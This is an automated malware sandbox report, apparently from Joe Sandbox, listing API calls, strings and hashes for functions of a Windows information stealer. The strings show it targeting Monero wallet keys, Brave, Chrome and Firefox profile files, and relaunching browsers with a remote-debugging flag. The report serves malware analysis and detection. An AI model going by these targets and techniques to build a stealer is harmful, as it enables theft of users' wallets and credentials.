                            • Part of subcall function 00037A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00037ABF
                            • Part of subcall function 000379E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000211B7), ref: 00037A10
                            • Part of subcall function 000379E0: RtlAllocateHeap.NTDLL(00000000), ref: 00037A17
                            • Part of subcall function 000379E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00037A2F
                          • ExitProcess.KERNEL32 ref: 000211C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                          • String ID:
                          • API String ID: 3550813701-0
                          • Opcode ID: b1dc6910abfd7c3a9f89699a5c0a1f798be3616978b2f16015abf8b5681d8758
                          • Instruction ID: 04a44498a023f219f377226b270576e8f878af515a3ea6a8bb04489b7e15ec98
                          • Opcode Fuzzy Hash: b1dc6910abfd7c3a9f89699a5c0a1f798be3616978b2f16015abf8b5681d8758
                          • Instruction Fuzzy Hash: 85E012F594430A53DA1173B4BC0BBAB329C5B1435AF000465F90982513EE35E8108266

                          Non-executed Functions

                          Function 0002BE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                          • FindFirstFileA.KERNEL32(00000000,?,00040B32,00040B2F,00000000,?,?,?,00041450,00040B2E), ref: 0002BEC5
                          • StrCmpCA.SHLWAPI(?,00041454), ref: 0002BF33
                          • StrCmpCA.SHLWAPI(?,00041458), ref: 0002BF49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0002C8A9
                          • FindClose.KERNEL32(000000FF), ref: 0002C8BB
                          Strings
                          • Brave, xrefs: 0002C0E8
                          • Preferences, xrefs: 0002C104
                          • \Brave\Preferences, xrefs: 0002C1C1
                          • --remote-debugging-port=9229 --profile-directory=", xrefs: 0002C534
                          • --remote-debugging-port=9229 --profile-directory=", xrefs: 0002C3B2
                          • Google Chrome, xrefs: 0002C6F8
                          • --remote-debugging-port=9229 --profile-directory=", xrefs: 0002C495
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 3334442632-1869280968
                          • Opcode ID: fa4e9f1ebe3a78e16df7eba1ff5daf4942178358b687a4c4a87118263164a3db
                          • Instruction ID: 81a30987995510bb713669f97c4b4b252ecc7fdd39884ea0337b348cc6dd2413
                          • Opcode Fuzzy Hash: fa4e9f1ebe3a78e16df7eba1ff5daf4942178358b687a4c4a87118263164a3db
                          • Instruction Fuzzy Hash: CB5246726101189BCB15FB70EDA6EEE737DAF55300F4045A8B54A66093EF309B48CF66
                          Function 00033B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00033B1C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00033B33
                          • lstrcat.KERNEL32(?,?), ref: 00033B85
                          • StrCmpCA.SHLWAPI(?,00040F58), ref: 00033B97
                          • StrCmpCA.SHLWAPI(?,00040F5C), ref: 00033BAD
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00033EB7
                          • FindClose.KERNEL32(000000FF), ref: 00033ECC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 1125553467-2524465048
                          • Opcode ID: c3318748f866a691895cf90f7e4d906724d52d8c7d306fb1b6e166378b2249ba
                          • Instruction ID: 2c9d08e5441acd153026908fe40d3062db28ada3aa3e9a82daacb43b551699c8
                          • Opcode Fuzzy Hash: c3318748f866a691895cf90f7e4d906724d52d8c7d306fb1b6e166378b2249ba
                          • Instruction Fuzzy Hash: 4CA11FB1A00218ABDB65DFA4DC89FEA737DAF58700F044598F60D96181EB719B88CF61
                          Function 00034B60 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00034B7C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00034B93
                          • StrCmpCA.SHLWAPI(?,00040FC4), ref: 00034BC1
                          • StrCmpCA.SHLWAPI(?,00040FC8), ref: 00034BD7
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00034DCD
                          • FindClose.KERNEL32(000000FF), ref: 00034DE2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$%s\%s$%s\*
                          • API String ID: 180737720-445461498
                          • Opcode ID: 9f2278cbb893cbe2651331e4a514e7c6b01765ddab0f6990586ac673fffd3227
                          • Instruction ID: c6dd2616ea5e21649980701f183f6394238adc3d2dbb31508dd610765466ffc3
                          • Opcode Fuzzy Hash: 9f2278cbb893cbe2651331e4a514e7c6b01765ddab0f6990586ac673fffd3227
                          • Instruction Fuzzy Hash: 43614971904118ABDB60EBA0EC49FEA777CBF48740F0045E8F64D96151EB70AB88CF91
                          Function 000347C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 000347D0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 000347D7
                          • wsprintfA.USER32 ref: 000347F6
                          • FindFirstFileA.KERNEL32(?,?), ref: 0003480D
                          • StrCmpCA.SHLWAPI(?,00040FAC), ref: 0003483B
                          • StrCmpCA.SHLWAPI(?,00040FB0), ref: 00034851
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 000348DB
                          • FindClose.KERNEL32(000000FF), ref: 000348F0
                          • lstrcat.KERNEL32(?,00FDEAE8), ref: 00034915
                          • lstrcat.KERNEL32(?,00FDD860), ref: 00034928
                          • lstrlen.KERNEL32(?), ref: 00034935
                          • lstrlen.KERNEL32(?), ref: 00034946
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                          • String ID: %s\%s$%s\*
                          • API String ID: 671575355-2848263008
                          • Opcode ID: 3c9929cc92ca343388acbb282bd7bc51205bda2982b9c44062b0ba2516056a7c
                          • Instruction ID: 467fde17a2cbcbc51908f304e812a64e2b6341e84183ff5f231780c2f506c7c9
                          • Opcode Fuzzy Hash: 3c9929cc92ca343388acbb282bd7bc51205bda2982b9c44062b0ba2516056a7c
                          • Instruction Fuzzy Hash: 8F5156B15042189BDB24EB70EC89FEE737CAB58350F4045E8F64996051EF70AB88CF91
                          Function 000340F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 00034113
                          • FindFirstFileA.KERNEL32(?,?), ref: 0003412A
                          • StrCmpCA.SHLWAPI(?,00040F94), ref: 00034158
                          • StrCmpCA.SHLWAPI(?,00040F98), ref: 0003416E
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 000342BC
                          • FindClose.KERNEL32(000000FF), ref: 000342D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 180737720-4073750446
                          • Opcode ID: dab1d952542454e04f46bb36747b109bf04fed619017fad3c7c20e39d4def5bc
                          • Instruction ID: 0dede74d6ec1d7b0d4c958af66ec057f82a93cfa57c6597da2fa5a4e86a720b2
                          • Opcode Fuzzy Hash: dab1d952542454e04f46bb36747b109bf04fed619017fad3c7c20e39d4def5bc
                          • Instruction Fuzzy Hash: 475169B2904218ABCB25EBB0EC49EFE777CBF54340F4045D8B64996051EB71AB89CF54
                          Function 0002EE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0002EE3E
                          • FindFirstFileA.KERNEL32(?,?), ref: 0002EE55
                          • StrCmpCA.SHLWAPI(?,00041630), ref: 0002EEAB
                          • StrCmpCA.SHLWAPI(?,00041634), ref: 0002EEC1
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0002F3AE
                          • FindClose.KERNEL32(000000FF), ref: 0002F3C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 180737720-1013718255
                          • Opcode ID: 1ea7e772967abe3b320cce76399dabf1ee68d91cda077e567677754386f6651a
                          • Instruction ID: 1db723f0d0963bd96fa713af337ef189d1799ed6b3805146a640491807517366
                          • Opcode Fuzzy Hash: 1ea7e772967abe3b320cce76399dabf1ee68d91cda077e567677754386f6651a
                          • Instruction Fuzzy Hash: 0AE10372A111189ADB55FB60DC62EEEB33DAF55300F4045E9B54A62093EF306F89CF62
                          Function 00060098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                          • API String ID: 0-1562099544
                          • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                          • Instruction ID: b4d9ed8afce343de73ce3e80d3d94b4b8c21ef0c37d08d42f756c92514670049
                          • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                          • Instruction Fuzzy Hash: 94E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                          Function 0002F7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000416B0,00040D97), ref: 0002F81E
                          • StrCmpCA.SHLWAPI(?,000416B4), ref: 0002F86F
                          • StrCmpCA.SHLWAPI(?,000416B8), ref: 0002F885
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0002FBB1
                          • FindClose.KERNEL32(000000FF), ref: 0002FBC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: prefs.js
                          • API String ID: 3334442632-3783873740
                          • Opcode ID: 73a744a001073d540f16b87d474d26a55b21cd3111e26e6f83c1d0aa1631911e
                          • Instruction ID: 9a7e53ed3b6622a008fc91f7046f1fd41780f60498fc91d01dbe4a0ffcc90c09
                          • Opcode Fuzzy Hash: 73a744a001073d540f16b87d474d26a55b21cd3111e26e6f83c1d0aa1631911e
                          • Instruction Fuzzy Hash: C7B13472A001189BCB25FF60DDA6EEE737DAF55340F0045A8E54A56193EF306B48CF92
                          Function 00021710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0004523C,?,?,?,000452E4,?,?,00000000,?,00000000), ref: 00021963
                          • StrCmpCA.SHLWAPI(?,0004538C), ref: 000219B3
                          • StrCmpCA.SHLWAPI(?,00045434), ref: 000219C9
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00021D80
                          • DeleteFileA.KERNEL32(00000000), ref: 00021E0A
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00021E60
                          • FindClose.KERNEL32(000000FF), ref: 00021E72
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
